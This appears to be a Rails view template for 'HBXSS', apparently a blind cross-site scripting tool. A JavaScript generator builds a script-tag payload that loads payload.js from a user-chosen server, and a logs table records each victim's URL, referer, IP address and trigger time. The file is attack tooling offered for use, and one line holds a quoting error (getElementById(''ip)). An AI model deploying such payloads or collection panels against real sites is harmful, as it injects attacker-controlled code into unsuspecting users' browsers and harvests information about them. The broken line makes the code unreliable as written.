<p id="notice"><%= notice %></p>
<h1>HBXSS</h1>
<hr>
<h2>XSS Payload</h2>
<script>
function gen()
{
 var pri = document.getElementById('pri');
 var ip = document.getElementById('ip');
 var payload = "<"+"script/id='hbxss' src='//"+ip.value+":3000/payload.js' class='"+pri.value+"'><"+"/script>";
 document.getElementById('payload').innerHTML=payload;
}
</script>
PRI KEY <input id="pri" type=text value="">
SERVER DOMAIN <input id="ip" type=text value="">
<input type=button value="GENERATE" onclick="gen()"><br>
<textarea type="text" id="payload" value="" style="width=503px;"></textarea>
<script>document.getElementById(''ip).value=document.location</script>
<hr>

<h2>Logs</h2>
<input type="text" value="search">
<table>
  <thead>
    <tr>
      <th>Key</th>
      <th>Url</th>
      <th>Referer Header</th>
      <th>Target IP</th>
      <th>Trigger Time</th>
      <th colspan="3"></th>
    </tr>
  </thead>

  <tbody>
    <% 
    @logs = @logs.sort.reverse
    @logs.each do |log| %>
      <tr>
        <td><%= log.key %></td>
        <td><%= log.url %></td>
        <td><%= log.referer %></td>
        <td><%= log.ip %></td>
        <td><%= log.time %></td>
        <td><%= link_to 'Show', log %></td>
        <td><%= link_to 'Edit', edit_log_path(log) %></td>
        <td><%= link_to 'Destroy', log, method: :delete, data: { confirm: 'Are you sure?' } %></td>
      </tr>
    <% end %>
  </tbody>
</table>

<br>

<%= link_to 'New Log', new_log_path %>
